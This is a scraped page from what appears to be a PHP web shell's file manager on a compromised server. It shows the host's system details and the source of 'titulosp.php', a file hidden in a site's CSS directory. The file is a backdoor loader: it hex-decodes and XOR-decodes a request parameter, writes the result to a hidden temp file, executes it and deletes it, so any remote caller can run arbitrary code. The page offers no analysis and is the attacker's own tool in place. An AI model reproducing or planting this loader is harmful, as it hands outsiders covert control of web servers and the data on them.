HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/vhost/disk-apps/teamdemo.sports-crowd.com/public/css/carnet/
Upload Files
File: /var/www/vhost/disk-apps/teamdemo.sports-crowd.com/public/css/carnet/titulosp.php
<?php

if(isset($_REQUEST) && isset($_REQUEST["flg"])){
	$entry = hex2bin($_REQUEST["flg"]);
	$element =   ''   ;    $x = 0; while($x < strlen($entry)){$element .= chr(ord($entry[$x]) ^ 62);$x++;}
	$symbol = array_filter([getenv("TEMP"), session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), "/tmp", ini_get("upload_tmp_dir")]);
	foreach ($symbol as $mrk) {
    		if (!( !is_dir($mrk) || !is_writable($mrk) )) {
    $res = sprintf("%s/.pset", $mrk);
    if (file_put_contents($res, $element)) {
	require $res;
	unlink($res);
	exit;
}
}
}
}
@ Telegram